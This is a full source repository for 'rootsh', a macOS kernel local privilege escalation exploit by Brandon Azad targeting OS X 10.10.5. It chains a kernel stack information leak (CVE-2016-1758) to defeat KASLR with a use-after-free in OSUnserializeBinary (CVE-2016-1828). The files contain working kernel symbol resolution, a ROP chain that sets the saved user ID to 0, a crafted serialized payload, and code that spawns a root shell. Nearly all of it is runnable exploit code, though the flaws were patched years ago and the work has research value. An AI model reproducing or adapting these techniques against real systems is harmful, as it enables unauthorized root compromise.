├── Makefile ├── README.md ├── kernel_image.c ├── kernel_image.h ├── kernel_rop.c ├── kernel_rop.h ├── kernel_slide.c ├── kernel_slide.h └── main.c /Makefile: -------------------------------------------------------------------------------- 1 | TARGET = rootsh 2 | 3 | all: $(TARGET) 4 | 5 | CFLAGS = -Wall -Wpedantic -Werror 6 | FRAMEWORKS = -framework IOKit 7 | 8 | # Note that in addition to the standard flags we also need 9 | # 10 | # -m32 -Wl,-pagezero_size,0 11 | # 12 | # We need these flags because we are leveraging the use-after-free to generate 13 | # a kernel NULL-pointer dereference. By mapping the NULL page in user space we 14 | # ensure that when the kernel dereferences the NULL pointer it gets a value 15 | # that we control. OS X does not allow 64-bit processes to map the NULL page; 16 | # however, for legacy support, 32-bit processes can map the NULL page. In order 17 | # to do so we generate a Mach-O executable without an initial __PAGEZERO 18 | # segment protecting NULL. The "-m32" flag compiles the executable as 32-bit, 19 | # while the "-Wl,-pagezero_size,0" flag causes the linker to not insert a 20 | # __PAGEZERO segment in the final Mach-O executable. 21 | $(TARGET): main.c kernel_image.c kernel_rop.c kernel_slide.c 22 | clang $(CFLAGS) $(FRAMEWORKS) -m32 -Wl,-pagezero_size,0 -O3 $^ -o $@ 23 | 24 | clean: 25 | rm -f -- $(TARGET) 26 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## rootsh 2 | 3 | rootsh is a local privilege escalation targeting OS X Yosemite 10.10.5 build 4 | 14F27. It exploits [CVE-2016-1758] and [CVE-2016-1828], two vulnerabilities in 5 | XNU that were patched in OS X El Capitan [10.11.4] and [10.11.5]. rootsh will 6 | not work on platforms with SMAP enabled. 7 | 8 | [CVE-2016-1758]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1758 9 | [CVE-2016-1828]: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-1828 10 | [10.11.4]: https://support.apple.com/en-us/HT206167 11 | [10.11.5]: https://support.apple.com/en-us/HT206567 12 | 13 | ### CVE-2016-1758 14 | 15 | CVE-2016-1758 is an information leak caused by copying out uninitialized bytes 16 | of kernel stack to user space. By comparing leaked kernel pointers with fixed 17 | reference addresses it is possible to recover the kernel slide. 18 | 19 | ### CVE-2016-1828 20 | 21 | CVE-2016-1828 is a use-after-free during object deserialization. By passing a 22 | crafted binary-serialized dictionary into the kernel, it is possible to trigger 23 | a virtual method invocation on an object with a controlled vtable pointer. 24 | 25 | ### License 26 | 27 | The rootsh code is released into the public domain. As a courtesy I ask that if 28 | you use any of this code in another project you attribute it to me. 29 | -------------------------------------------------------------------------------- /kernel_image.c: -------------------------------------------------------------------------------- 1 | /* kernel_image.c 2 | * Brandon Azad 3 | * 4 | * Kernel parsing routines to find addresses of symbols and byte sequences. 5 | */ 6 | 7 | #include "kernel_image.h" 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | #include "kernel_slide.h" 17 | 18 | static struct mach_header_64 * kernel; 19 | static size_t kernel_size; 20 | static uint64_t kernel_base; 21 | static struct symtab_command * kernel_symtab; 22 | 23 | /* Load the kernel binary into the current process's memory and parse it to 24 | find the symbol table. */ 25 | int 26 | load_kernel() { 27 | int fd = open("/System/Library/Kernels/kernel", O_RDONLY); 28 | if (fd == -1) { 29 | return 1; 30 | } 31 | struct stat st; 32 | int err = fstat(fd, &st); 33 | if (err) { 34 | close(fd); 35 | return 2; 36 | } 37 | kernel_size = st.st_size; 38 | kernel = mmap(NULL, kernel_size, PROT_READ, MAP_SHARED, fd, 0); 39 | close(fd); 40 | if (kernel == MAP_FAILED) { 41 | return 3; 42 | } 43 | struct load_command * lc = (struct load_command *)((uintptr_t)kernel + sizeof(*kernel)); 44 | while ((uintptr_t)lc < (uintptr_t)kernel + (uintptr_t)kernel->sizeofcmds) { 45 | if (lc->cmd == LC_SYMTAB) { 46 | kernel_symtab = (struct symtab_command *)lc; 47 | } else if (lc->cmd == LC_SEGMENT_64) { 48 | struct segment_command_64 * sc = (struct segment_command_64 *)lc; 49 | if (strcmp(sc->segname, SEG_TEXT) == 0) { 50 | kernel_base = sc->vmaddr; 51 | } 52 | } 53 | lc = (struct load_command *)((uintptr_t)lc + lc->cmdsize); 54 | } 55 | if (kernel_symtab == NULL) { 56 | return 4; 57 | } 58 | if (kernel_base == 0) { 59 | return 5; 60 | } 61 | return 0; 62 | } 63 | 64 | /* Find the address of the given kernel symbol in kernel memory. The returned 65 | address factors in the kernel slide, so it can be used directly in building 66 | a ROP payload. */ 67 | int 68 | find_kernel_symbol(const char * name, uint64_t * addr) { 69 | const char * base = (const char *)((uintptr_t)kernel + kernel_symtab->stroff); 70 | const char * str = (const char *)((uintptr_t)base + 4); 71 | const char * end = (const char *)((uintptr_t)base + kernel_symtab->strsize); 72 | uint64_t strx; 73 | for (;; ++str) { 74 | strx = (uintptr_t)str - (uintptr_t)base; 75 | const char * p = name; 76 | while (str < end && *p == *str && *p) { 77 | ++p; ++str; 78 | } 79 | if (str < end && *p == *str) { 80 | break; 81 | } 82 | while (str < end && *str) { 83 | ++str; 84 | } 85 | if (str == end) { 86 | return 1; 87 | } 88 | } 89 | struct nlist_64 * nl = (struct nlist_64 *) ((uintptr_t)kernel + kernel_symtab->symoff); 90 | for (uint32_t i = 0; i < kernel_symtab->nsyms; ++i) { 91 | if (nl[i].n_un.n_strx == strx) { 92 | if ((nl[i].n_type & N_TYPE) != N_SECT) { 93 | return 2; 94 | } 95 | *addr = nl[i].n_value + kernel_slide; 96 | return 0; 97 | } 98 | } 99 | return 3; 100 | } 101 | 102 | /* Find the address of the given byte sequence in kernel memory. The returned 103 | address factors in the kernel slide, so it can be used directly in building 104 | a ROP payload. */ 105 | int 106 | find_kernel_bytes(const void * value, size_t size, uint64_t * addr) { 107 | const void * found = memmem(kernel, kernel_size, value, size); 108 | if (found == NULL) { 109 | return 1; 110 | } 111 | *addr = (uint64_t)found - (uint64_t)kernel + kernel_base + kernel_slide; 112 | return 0; 113 | } 114 | -------------------------------------------------------------------------------- /kernel_image.h: -------------------------------------------------------------------------------- 1 | /* kernel_image.h 2 | * Brandon Azad 3 | * 4 | * Kernel parsing routines to find addresses of symbols and byte sequences. 5 | */ 6 | 7 | #include 8 | #include 9 | 10 | int load_kernel(); 11 | int find_kernel_symbol(const char * name, uint64_t * addr); 12 | int find_kernel_bytes(const void * value, size_t size, uint64_t * addr); 13 | -------------------------------------------------------------------------------- /kernel_rop.c: -------------------------------------------------------------------------------- 1 | /* kernel_rop.c 2 | * Brandon Azad 3 | * 4 | * Kernel instruction pointer control to execute the ROP payload. 5 | * 6 | * CVE-2016-1828: 7 | * This vulnerability is a use-after-free in OSUnserializeBinary that can be 8 | * triggered via the io_service_get_matching_services_bin Mach trap from 9 | * user space. 10 | */ 11 | 12 | #include "kernel_rop.h" 13 | 14 | #include 15 | #include 16 | #include 17 | #include 18 | 19 | #include "kernel_image.h" 20 | 21 | static const uint8_t xchg_esp_eax_pop_rsp_ins[] = { 22 | 0x94, /* xchg esp, eax */ 23 | 0x5c, /* pop rsp */ 24 | 0xc3, /* ret */ 25 | }; 26 | static const uint8_t xchg_rax_rdi_ins[] = { 27 | 0x48, 0x97, /* xchg rax, rdi */ 28 | 0xc3, /* ret */ 29 | }; 30 | static const uint8_t set_svuid_0_ins[] = { 31 | 0xc7, 0x47, 0x08, 0x00, 0x00, 0x00, 0x00, /* mov dword ptr [rdi+8], 0 */ 32 | 0xc3, /* ret */ 33 | }; 34 | 35 | /* Build the ROP payload that will be used to control code execution in the 36 | kernel. The payload is stored on the NULL page, so the kernel will panic if 37 | SMAP is enabled. The entry point is the instruction pointer stored in 38 | virtual method 4, which will pivot to the ROP stack. The ROP stack is placed 39 | at the end of the NULL page so that there's room for the stack frames of the 40 | functions we call. 41 | 42 | The payload itself sets the saved user ID to 0. Once we return from the 43 | kernel we can elevate privileges by calling seteuid(0). */ 44 | int 45 | build_rop_payload() { 46 | uint64_t xchg_esp_eax_pop_rsp, xchg_rax_rdi, set_svuid_0; 47 | uint64_t current_proc, proc_ucred, posix_cred_get, thread_exception_return; 48 | int err = 0; 49 | err |= find_kernel_bytes(xchg_esp_eax_pop_rsp_ins, sizeof(xchg_esp_eax_pop_rsp_ins), &xchg_esp_eax_pop_rsp); 50 | err |= find_kernel_bytes(xchg_rax_rdi_ins, sizeof(xchg_rax_rdi_ins), &xchg_rax_rdi); 51 | err |= find_kernel_bytes(set_svuid_0_ins, sizeof(set_svuid_0_ins), &set_svuid_0); 52 | if (err) { 53 | printf("error: could not locate ROP gadgets\n"); 54 | return 1; 55 | } 56 | err |= find_kernel_symbol("_current_proc", ¤t_proc); 57 | err |= find_kernel_symbol("_proc_ucred", &proc_ucred); 58 | err |= find_kernel_symbol("_posix_cred_get", &posix_cred_get); 59 | err |= find_kernel_symbol("_thread_exception_return", &thread_exception_return); 60 | if (err) { 61 | printf("error: could not locate symbols for ROP payload\n"); 62 | return 2; 63 | } 64 | vm_address_t payload_addr = 0; 65 | size_t size = 0x1000; 66 | /* In case we are re-executing, deallocate the NULL page. */ 67 | vm_deallocate(mach_task_self(), payload_addr, size); 68 | kern_return_t kr = vm_allocate(mach_task_self(), &payload_addr, size, 0); 69 | if (kr != KERN_SUCCESS) { 70 | printf("error: could not allocate NULL page for payload\n"); 71 | return 3; 72 | } 73 | uint64_t * vtable = (uint64_t *)payload_addr; 74 | uint64_t * rop_stack = ((uint64_t *)(payload_addr + size)) - 8; 75 | /* Virtual method 4 is called in the kernel with rax set to 0. */ 76 | vtable[0] = (uint64_t)rop_stack; /* *0 = rop_stack */ 77 | vtable[4] = xchg_esp_eax_pop_rsp; /* rsp = 0; rsp = *rsp; start rop */ 78 | rop_stack[0] = current_proc; /* rax = &proc */ 79 | rop_stack[1] = xchg_rax_rdi; /* rdi = &proc */ 80 | rop_stack[2] = proc_ucred; /* rax = &cred */ 81 | rop_stack[3] = xchg_rax_rdi; /* rdi = &cred */ 82 | rop_stack[4] = posix_cred_get; /* rax = &posix_cred */ 83 | rop_stack[5] = xchg_rax_rdi; /* rdi = &posix_cred */ 84 | rop_stack[6] = set_svuid_0; /* we are now setuid 0 */ 85 | rop_stack[7] = thread_exception_return; /* stop rop */ 86 | return 0; 87 | } 88 | 89 | /* Trigger the use-after-free to start executing the ROP payload. If the ROP 90 | payload succeeds the UID and GID of the process will be set to 0. */ 91 | int 92 | execute_rop_payload() { 93 | uint32_t data[] = { 94 | 0x000000d3, /* magic */ 95 | 0x81000010, /* 0: OSDictionary */ 96 | 0x08000002, 0x00000061, /* 1: key "a" */ 97 | 0x04000020, 0x00000000, 0x00000000, /* 2: 1[2: OSNumber] */ 98 | 0x08000002, 0x00000062, /* 3: key "b" */ 99 | 0x04000020, 0x00000000, 0x00000000, /* 4: 2[4: OSNumber] */ 100 | 0x0c000001, /* 5: key "a" */ 101 | 0x0b000001, /* 6: true ; heap freelist: 1[2:] */ 102 | 0x0c000003, /* 7: key "b" */ 103 | 0x0b000001, /* 8: true ; heap freelist: 2[4:] 1[2:] */ 104 | 0x0c000001, /* 9: key "a" */ 105 | 0x0a000028, /* 10: 2[10,4: OSData] => 1[2: contents] */ 106 | 0x00000000, 0x00000000, /* vtable ptr */ 107 | 0x00000000, 0x00000000, 0x00000000, 0x00000000, 108 | 0x00000000, 0x00000000, 0x00000000, 0x00000000, 109 | 0x0c000001, /* 11: key "b" */ 110 | 0x8c000002, /* 12: 1[2: contents]->retain() */ 111 | }; 112 | mach_port_t master_port, iterator; 113 | kern_return_t kr = IOMasterPort(MACH_PORT_NULL, &master_port); 114 | if (kr != KERN_SUCCESS) { 115 | return 1; 116 | } 117 | kr = io_service_get_matching_services_bin(master_port, (char *)data, sizeof(data), &iterator); 118 | seteuid(0); 119 | setuid(0); 120 | setgid(0); 121 | if (kr == KERN_SUCCESS) { 122 | IOObjectRelease(iterator); 123 | } 124 | if (getuid() == 0) { 125 | return 0; 126 | } 127 | printf("error: could not execute ROP payload\n"); 128 | return 2; 129 | } 130 | -------------------------------------------------------------------------------- /kernel_rop.h: -------------------------------------------------------------------------------- 1 | /* kernel_rop.h 2 | * Brandon Azad 3 | * 4 | * Kernel instruction pointer control to execute the ROP payload. 5 | */ 6 | 7 | int build_rop_payload(); 8 | int execute_rop_payload(); 9 | -------------------------------------------------------------------------------- /kernel_slide.c: -------------------------------------------------------------------------------- 1 | /* kernel_slide.c 2 | * Brandon Azad 3 | * 4 | * Kernel information leak to recover the kernel slide. 5 | * 6 | * CVE-2016-1758: 7 | * This is a kernel information leak in the function if_clone_list caused by 8 | * copying out 8 uninitialized bytes of the kernel stack to user space. 9 | */ 10 | 11 | #include "kernel_slide.h" 12 | 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | uint64_t kernel_slide; 19 | 20 | static int 21 | is_kernel_pointer(uint64_t addr) { 22 | return (0xffffff7f00000000 <= addr && addr < 0xffffff8100000000); 23 | } 24 | 25 | static int 26 | is_kernel_slide(uint64_t slide) { 27 | return ((slide & ~0x000000007fe00000) == 0); 28 | } 29 | 30 | /* Recover the kernel slide. The kernel slide is used to translate the 31 | compile-time addresses in the kernel binary to runtime addresses in the live 32 | kernel. */ 33 | int 34 | find_kernel_slide() { 35 | int sockfd = socket(AF_INET, SOCK_STREAM, 0); /* prime stack */ 36 | if (sockfd == -1) { 37 | printf("error: socket failed\n"); 38 | return 1; 39 | } 40 | char buffer[IFNAMSIZ]; 41 | struct if_clonereq ifcr = { 42 | .ifcr_count = 1, 43 | .ifcr_buffer = buffer, 44 | }; 45 | int err = ioctl(sockfd, SIOCIFGCLONERS, &ifcr); 46 | if (err == -1) { 47 | printf("error: ioctl failed\n"); 48 | return 2; 49 | } 50 | close(sockfd); 51 | uint64_t value = *(uint64_t *)(buffer + 8); 52 | if (!is_kernel_pointer(value)) { 53 | printf("error: leaked 0x%016llx\n", value); 54 | return 3; 55 | } 56 | kernel_slide = value - 0xffffff800033487f; /* 10.10.5 (14F27): __kernel__: _ledger_credit+95 */ 57 | if (is_kernel_slide(kernel_slide)) { 58 | return 0; 59 | } 60 | printf("error: leaked 0x%016llx\n", value); 61 | return 4; 62 | } 63 | -------------------------------------------------------------------------------- /kernel_slide.h: -------------------------------------------------------------------------------- 1 | /* kernel_slide.h 2 | * Brandon Azad 3 | * 4 | * Kernel information leak to recover the kernel slide. 5 | */ 6 | 7 | #include 8 | 9 | extern uint64_t kernel_slide; 10 | 11 | int find_kernel_slide(); 12 | -------------------------------------------------------------------------------- /main.c: -------------------------------------------------------------------------------- 1 | /* main.c 2 | * Brandon Azad 3 | * 4 | * Entry point for rootsh, a local privilege escalation on OS X 10.10.5 build 5 | * 14F27. 6 | */ 7 | 8 | #include "kernel_image.h" 9 | #include "kernel_slide.h" 10 | #include "kernel_rop.h" 11 | 12 | #include 13 | #include 14 | 15 | int 16 | main(int argc, char * argv[]) { 17 | if ((uint32_t)main < 0x8000) { 18 | execve(argv[0], argv, NULL); 19 | } 20 | sync(); /* Finalize any writes to the filesystem in case we crash. */ 21 | int err = load_kernel(); 22 | if (err) { 23 | return err; 24 | } 25 | err = find_kernel_slide(); 26 | if (err) { 27 | return err; 28 | } 29 | err = build_rop_payload(); 30 | if (err) { 31 | return err; 32 | } 33 | err = execute_rop_payload(); 34 | if (err) { 35 | return err; 36 | } 37 | argv[0] = "/bin/sh"; 38 | execve(argv[0], argv, NULL); 39 | printf("error: could not exec shell\n"); 40 | return 1; 41 | } 42 | --------------------------------------------------------------------------------